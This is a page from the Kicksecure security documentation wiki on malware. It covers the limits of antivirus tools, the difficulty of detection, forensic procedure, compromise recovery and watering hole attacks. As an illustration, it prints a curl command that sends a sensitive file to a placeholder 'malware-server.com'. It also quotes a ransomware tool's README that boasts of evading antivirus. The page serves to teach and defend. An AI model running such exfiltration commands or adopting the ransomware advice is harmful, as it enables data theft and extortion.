Kicksecure ™

Download

On Computer USB Installation Intel / AMD64 ARM64 Raspberry Pi PPC64 Windows (VM) Mac Linux (VM) VirtualBox (VM) Qubes (VM) KVM (VM) Debian morph to Kicksecure More options Source Code

About

Overview Features Why Open Source? Project Activities Contributors Mission & Vision

Docs

Documentation FAQ Troubleshooting

Community

Forums Forum Best Practices Contribute

Support

Self Support First Policy Search Engines, Docs and AI Support (Limited) Reporting Bugs Contact (Restricted)

Tools Upload file Special pages Recent changes Print Version Page meta What links here Related changes Page information

Page Read Edit History Move Protection Unwatch Watch Delete Purge

User Preferences Watchlist Contributions Logout Create account Login

Donate

• Virus is often used as a synonym for malware.
• Computer infections include viruses, trojan horses, spyware, ransomware and other categories of malware.
• Malware stands for malicious software. A computer virus is a an undesirable program running on the user's computer often without their consent or even without their knowledge.
• Preventing malware infections is very important because malware can steal your identity, passwords, accounts, impersonate you, steal all your private data, you risk getting SWATTed and more.
• Computer security, a computer that is free of malware, requires a security concept. Just only installing an antivirus scanner is insufficient.
• Detection and removal of malware is a hard problem. The utility of antivirus tools is actually rather limited. A much safer security concept needs to focus on prevention of malware infections, not on malware detection.

Malware has malicious intent and can potentially: ^[1]

1. Kicksecure is based on Debian and using the Linux kernel. There exists much less malware for Linux generally.
2. Kicksecure comes with many security features.
3. The more you know, the safer you can be. See Documentation.

Targeted malware is the opposite of off-the-shelf malware. Targeted malware is specifically crafted against a known target to attack a specific system or limited amount of systems only. The goal is to avoid detection by not being installed on too many systems where qualified people might detect the malware and publish the findings.

On the other hand, off-the-shelf malware attempts to spread in bulk against larger groups or the general public with the goal of taking over as many systems as possible. It should be noted that malware tools are widely available, with proof-of-concept ransomware even existing on GitHub at the time of writing. For example, the "DemonWare" tool can be utilized to create malicious payloads for ransomware, adware or general malware purposes on the Windows, Linux and macOS platforms: ^[2]

Your Ransomware As A Service (RAAS) Tool for all your hacking needs. ... This was made to demonstrate ransomware and how easy it is to make. It works on Windows, Linux and MacOS. It's recommended to compile payload.py to EXE to make it more portable. ... This script does not get detected by any anti-virus. Self made scripts go undetected 99% of the time. It's easy to write something nasty like ransomware, adware, malware, you name it. ... I recommend a VPN that allows port forwarding (For example; PIA VPN) when using this outside your network, or better, a cloud computer hosted elsewhere, like Amazon AWS. The conclusion of this project is that it is easy to brick a system and earn money doing it. This script doesn't use any exploits to achieve its goal, but can easily be coded into it as a nice feature.

Malware creators are likely to utilize existing software samples to create more pernicious tools with features like: greater payload customization (custom files), man-in-the-middle and DNS poisoning (website redirection), email payloads and email spoofing, anti-virus or other detection warnings, focused data gathering (passwords or other sensitive files), detection of mounted drives (for encryption), encrypted transfer of traffic between payloads and malicious servers, and much more.

Antivirus products and personal firewalls are not drop in solutions for a secure host. Malware can often stay undetected and evade scans, while application level personal firewalls are often circumvented. ^[3] Polymorphic code and rootkits essentially render antivirus products helpless. ^{[4] [5]}

The following paragraph is currently being discussed.

Antivirus tools are actually worse than useless. In the case of sophisticated and targeted attacks, the antivirus software can serve as a pathway to exploiting a system's kernel, since they almost always run with administration level privileges. ^[6] Some antivirus software also harms privacy by sending system files back to the company servers for analysis. ^[7] The software also actively conducts man-in-the-middle attacks on secure SSL connections, enabling very sensitive information to be inspected. ^[8] Research found that HTTPS inspection features in some antivirus decreased the security offered by HTTPS, while introducing vulnerabilities that allows connecting to websites with self-signed certificates (possibly signed by an active attacker conducting MITM) without warning, totally compromising the security offered by HTTPS. ^[9]

https://privsec.dev/posts/knowledge/badness-enumeration/#antiviruses

The optimal scenario is to avoid infection by malware in the first place. Once malicious code has accessed a system, it is next to impossible to contain. Sensible steps include: hardening the operating system, carefully vetting programs and files that are retrieved from the Internet, using hypervisors (virtualizers) to isolate software that processes untrusted data, and periodically deleting and recreating virtual machines that are used for sensitive operations. ^[10]

In the event a system compromise is strongly suspected or confirmed, the ultimate goal is to re-establish a trusted, private environment for future activities -- see Compromise Recovery for techniques to recover from Kicksecure (host or VM) infections.

Detecting off-the-shelf (standardized) malware is a very hard problem and conceptually a lost cause.

The inconvenient and somehow embarrassing truth for us - the malware experts - is that there does not exist any reliable method to determine if a given system is not compromised. True, there is a number of conditions that can warn us that the system is compromised, but there is no limit on the number of checks that a system must pass in order to be deemed “clean”.Joanna Rutkowska, security researcher and founder of Qubes OS

If uncustomized malware is widespread enough, then it has a chance of being detected by a technician. Targeted malware might also get detected by a technician, but the likelihood is low unless they are lucky or gifted.

Non-technical users do not have many good options. They can either:

• Spend a few years to rapidly increase their knowledge base of operating systems, network protocols, package analysis, programming, disassembly etc., and then try their luck.
• Pay exorbitant sums to a technician to try and find system malware, even though there is no certainty of success. ^{[11] [12]}
• Or seek the voluntary assistance of a technician to find malware, if they are both a high value target and have a reasonable rationale for why they are likely compromised. ^[13]

Related:

Finding vulnerabilities in software is a complex task. A deep understanding of the source code, the ability to interpret disassembly, and/or proficiency with specialized tools (like static or dynamic analysis tools such as valgrind) are essential. Often, these skills are beyond the reach of typical users, making it primarily a domain for software developers and security researchers.

Examples:

• For a discussion on identifying vulnerabilities in C code or disassembly, see Why is this binary vulnerable to buffer overflow?
• For a detailed vulnerability research report, refer to CVE-2021-3998 and CVE-2021-3999 in glibc's realpath() and getcwd().

If trivial changes are noticed on your system -- such as a duplicate desktop icon -- this is not evidence of malware, a hack, or leak. Similarly, if warning or error messages appear that are difficult to understand, in most cases there is no need for panic. If something unexpected occurs such as the appearance of a "htaccess file in home directory", or graphical glitches emerge in some applications, then it is more likely a harmless bug and/or usability issue rather than a compromise. Never in the history of malware analysis, security researchers relied on unexpected occurrences such as duplicate desktop icons. Malware analysis is a skill that requires studying malware detection techniques. It's not a skill that can be casually picked up by pure observation and guesswork.

Skilled attackers do not leave such obvious traces of their breach. An infection by tailored malware is more plausible in this scenario, and this is virtually impossible to detect by reading random messages in system logs. Even malware that is bought off-the-shelf (malware building toolkits) is unlikely to be discovered by cursory inspections. ^[14] Rootkit technology is no doubt a standard feature of the various programs.

Strange files, messages, or other system behavior could feasibly relate to an attacker wanting the user to find something. However, the likelihood of this kind of harassment is considered low. Script kiddies ("skiddies") are unskilled attackers who use scripts or programs to conduct attacks on computer systems and networks, most often with juvenile outcomes. For example, they might use programs to remotely control poorly-secured Microsoft Windows desktops, trolling their victims from an open, forced chat window, opening their DVD drive, and so on. It is improbable that skiddies can achieve similar exploits against Linux, Xen, or BSD platforms. ^[15] Sophisticated attackers (who are likely to use tailored malware) generally avoid detection unless the user is unlucky enough to be a victim of Zersetzung (a psychological warfare technique).

How malware actually works: Contrary to popular belief, most sophisticated malware operates in a way that is designed to avoid detection by the user entirely. A common misconception is that malware will cause noticeable changes to the system, such as altering the desktop background, changing visual styles, moving windows around, or switching the default applications of the operating system. In reality, effective malware is far more subtle.

For instance, a piece of malware designed to steal data might execute a command to upload sensitive files to a remote server without altering the system in a way that would draw attention. Consider the following example:

cat sensitive_file.txt | curl -X POST -d @- http://malware-server.com/upload

In this example, the command reads the contents of a file (in this case, sensitive_file.txt) and immediately uploads it to a malicious server (malware-server.com). This entire operation can occur silently in the background, with no visible signs to the user that something is amiss. At no point during this process are there user-noticeable changes. The malware's success hinges on its ability to remain invisible, operating quietly behind the scenes while carrying out its malicious activities.

Every forum post and support request requires time that could otherwise be directed to Kicksecure development. Unless there is genuine evidence of a serious and credible problem, there is no need for a new post. See also Support Request Policy (rationale). Developers and the Kicksecure community at large do not have enough time to explain every message that Linux might report. In most cases, they are not important and outside the control of Kicksecure developers.

When an antivirus program reports having found a virus or other issue, it doesn't necessarily mean that there is an actual issue. According to AV comparatives and many other sources, there are false-positive reports, also known as false alarms. For example, you can see the results of the False Alarm Test March 2022. A virus or issue found report is, at best, an indication that there could be an issue, but there is no definitive proof.

Furthermore, the usefulness of antivirus reports is limited because, for most (if not all) commercial vendors of antivirus software, it is not easy or even impossible for the user and outside developers to get in contact with a malware analyst at the antivirus company to receive further information, virus confirmation, bug reports, and so forth.

This issue is exacerbated by commercial antivirus software and their database, which are usually closed source or even obfuscated. Therefore, even outside developers have a hard time investigating virus reports.

To prove that there is an actual security issue, more than a report by an antivirus scanner is required. This is due to the possibility of false alarms by antivirus software.

Proof of actual vulnerabilities could include showing a code issue in the source code, in the disassembly, malicious behavior in a debugger, a capture of the network traffic from a packet analyzer or proof of concept (PoC) exploit.

If a file is reported as infected by a virus scanner it does not necessarily follow that the reported file is the origin of the virus. This is due to file-infecting viruses.

What is a file-infecting virus? A file-infecting virus is a type of malware that infects files with the intent to cause permanent damage, make them unusable or spread itself to make detection and removal of the virus harder. A file-infecting virus injects its own code into different files.

Users with a serious intention to research these issues are encouraged to assist in accordance with their skills. Testing, bug reporting or even bug fixing are laudable endeavors. If this process is unfamiliar, understand that about thirty minutes is required per message / identifier to ascertain if the discovered result ^[16] is a false positive, regression, known or unknown issue.

It is unhelpful to ask questions in forums, issue trackers and on various mailing lists with concerns that have already been discussed, or which are known issues / false positives. In all cases, please first search thoroughly for the result that was found. Otherwise, the noise to signal ratio increases and Kicksecure development is hindered. Users valuing security don't want this, otherwise this would violate the aforementioned assumption.

If something is identified that appears to be a Kicksecure-specific issue, please first read the Self Support First Policy before making a notification.

See Firmware Trojan.

See Backdoors.

See Vulnerability versus Malicious Backdoor.

Malware analysis and backdoor hunting are processes used to investigate whether a device has been compromised by malicious software or unauthorized access tools.

A critical rule in malware analysis is: never boot from the potentially infected device. Doing so can allow malware or backdoors to activate, erase evidence, hide themselves, or attempt to spread to other systems. Even reading the device from its own operating system cannot be trusted, as it may be compromised and present false or incomplete information.

Malware Analysis and Backdoor Hunting Procedure:

• Power off the device immediately: Prevent any further changes or activity by the malware.
• Extract data using a trusted, external system: This is often done by removing the storage and connecting it to a clean forensic workstation, if possible.
• Use a write blocker: This ensures that the forensic workstation does not modify the original data on the device.
• Analyze the storage as raw data: Specialized forensic tools are used to inspect files, logs, and hidden sectors without running any executable content from the device.

If storage cannot be physically removed (e.g., in most modern Android devices), then analysis is extremely limited without rooting or exploiting the device, which can itself alter data and evidence.

For a secure and thorough investigation, it might be advisable that the device should be handled using proper forensic protocols by trained professionals. ^[17]

Volatile Memory (RAM): If the device is running when discovered, first acquire a memory dump (RAM capture) before powering off, since malware and useful evidence may reside only in memory and will be lost when the power is disconnected.

One strategy is to cut network access to prevent further risk of randomware encryption), data exfiltration or malware hiding itself and/or powering off.

There are at least two major strategies.

• A) authorship attribution, malware analysis; or
• B) damage containment

It is theoretically possible to discover malware by comparing an already used/booted, supported VM image such as a VirtualBox .ova image or Qubes template with the original. However, at the time of writing this is infeasible for Kicksecure developers.

Kicksecure is not an investigative nor a malware forensics outfit. Leaks will be rejected. Unsolicited information will remain unread and will be securely deleted. No malware analysis and/or publication services are available. Feel free to consult third parties and knowledgeable malware researchers to discover the vulnerabilities, while notifying the publishers/maintainers of each package directly through responsible disclosure. Only responsibly notify us about security bugs in the instance of a Kicksecure package being affected. ^[18]Kicksecure No Leaks Policy

Qubes OS has a forum category Help, I think I’ve been hacked sub forum. (category description) (Proposal: “I think I got hacked” sub-category of “User Support” contains reasoning why these kinds of posts have been "banished" into a sub forum.) At time of writing, there was little to no developer or malware analyst activity in that sub forum. Reasons for that are as follows.

Quote security researcher, Joanna Rutkowska, founder of Qubes OS:

The inconvenient and somehow embarrassing truth for us – the malware experts – is that there does not exist any reliable method to determine if a given system is not compromised. True, there is a number of conditions that can warn us that the system is compromised, but there is no limit on the number of checks that a system must pass in order to be deemed “clean”.

Professional malware audits require a completely different skill set to software development, such as forensic and research capabilities, along with a laboratory facility. An analogy is expecting a professional chef to identify the source and quality of every ingredient used in an already cooked meal; this expectation is completely unrealistic. Like most, if not all Linux distributions, Kicksecure relies upon many different software packages which are developed by countless independent parties; see Linux User Experience versus Commercial Operating Systems to learn more about the Linux organizational structure.

The likelihood of discovering purposeful modifications is low until fully reproducible builds (or at least Verifiable Builds) are available. Presently there is not a single Linux distribution installation whose image can be re-built deterministically by independent third parties. That means introduced modifications cannot be easily discovered during the compilation process. As the Reproducible Builds project has stated:

The motivation behind the Reproducible Builds project is therefore to allow verification that no vulnerabilities or backdoors have been introduced during this compilation process.

As the Qubes OS project has stated:

(A “rebuilder” is a program that takes a binary and its purported source code as inputs, along with any applicable metadata, and attempts to build an identical binary from the source code. The goal is to check whether the binary was really compiled from its claimed source code.)

Proper malware audit capabilities are conditional upon several key milestones:

1. Completion of Debian's Reproducible Builds project -- 91% of packages currently build reproducibly in Debian bullseye.
2. All packages build reproducibly in Debian and other Linux distributions.
3. The Linux distribution policy mandates package repoducibility.
4. Independent package rebuilders become available.
5. Note that reproducible package builds are not equivalent to reproducible installed packages. ^[19]
6. The Reproducible Builds project works towards reproducible installation CD/DVD images. ^[20]
7. Independent installation image rebuilders become available.
8. Reproducible VM images become feasible.
9. Independent VM image rebuilders become available.
10. Auditing already used (VM) images is increasingly feasible.

To date only the first milestone has been partially accomplished. Completing the remaining prerequisite milestones will probably take many years of difficult engineering work.

See also:

It should be noted that advanced malware can infect a user's computer via a Watering Hole Attack. This vector has similarities to the software version of a Supply Chain Attack, and these methods are not mutually exclusive: ^[21]

A watering hole attack is a malware attack in which the attacker observes the websites often visited by a victim or a particular group, and infects those sites with malware. A watering hole attack has the potential to infect the members of the targeted victim group. Although uncommon, a watering hole attack does pose a significant threat to websites, as these attacks are difficult to diagnose.

In the case of Kicksecure users, any future attempt would logically target hosted content on GitHub, SourceForge, various forum locations, mirrors, popular documentation links, and frequently visited security and anonymity sites like Tails, The Tor Project and so on. ^[22] The hope is that developers, contributors and general users of the software become infected with stealthy malware that is immune to detection.

The attack involves a few steps: ^{[21] [23]}

1. Zero-day or other vulnerabilties target the website software.
2. Malicious JavaScript or HTML are most often used to inject malicious programming code.
3. The code redirects visitors to a different site that serves "malvertisments" or malware masquerading as legitimate software.
4. Once installed, the malware can infect various members of the targeted group.

It should be noted that advanced adversaries are capable of gaining knowledge about the behavioral patterns of target groups -- where they congregate, topics of research, related interests, and handle mapping of anonymous networks. This generic browsing and membership knowledge, along with observed security practices, greatly narrows the number of specific sites that need be targeted and the suitable attack mode. One way to mitigate this threat is to rigorously inspect websites for malicious code.

Interested readers can learn about six recent watering hole attacks targeting the US, China, banks and other entities here.

• Mental Model
• Threat Modeling
• Disaster Recovery
• Factory Reset
• Operating System Software and Updates
• System Hardening Checklist
• Firmware Security and Updates
• Open-source Hardware
• https://github.com/tylabs/quicksand

Hardware Threat Minimization Documentation Backdoor Previous page: Hardware Threat Minimization Index page: Documentation Next page: Backdoor

Kicksecure A secure by default operating system with the latest security research in place.

Dark mode

Follow us on social media

Supported by Power Up Privacy

Kicksecure is proudly supported until 2026 by Power Up Privacy, a privacy advocacy group that seeks to supercharge privacy projects with resources so they can complete their mission of making our world a better place. (Strictly subject to our sponsorship policy.)

At Kicksecure we value freedom and trust, supporting Open Source and Freedom Software

By using this website, you acknowledge you have read, understood, and agree to be bound by these agreements: Terms of Service, Privacy Policy, Cookie Policy, E-Sign Consent, DMCA, Imprint 2012- 2025 ENCRYPTED SUPPORT LLC

Your support makes
all the difference!

We believe security software like Kicksecure needs to remain Open Source and independent. Would you help sustain and grow the project? Learn more about our 13 year success story and maybe DONATE!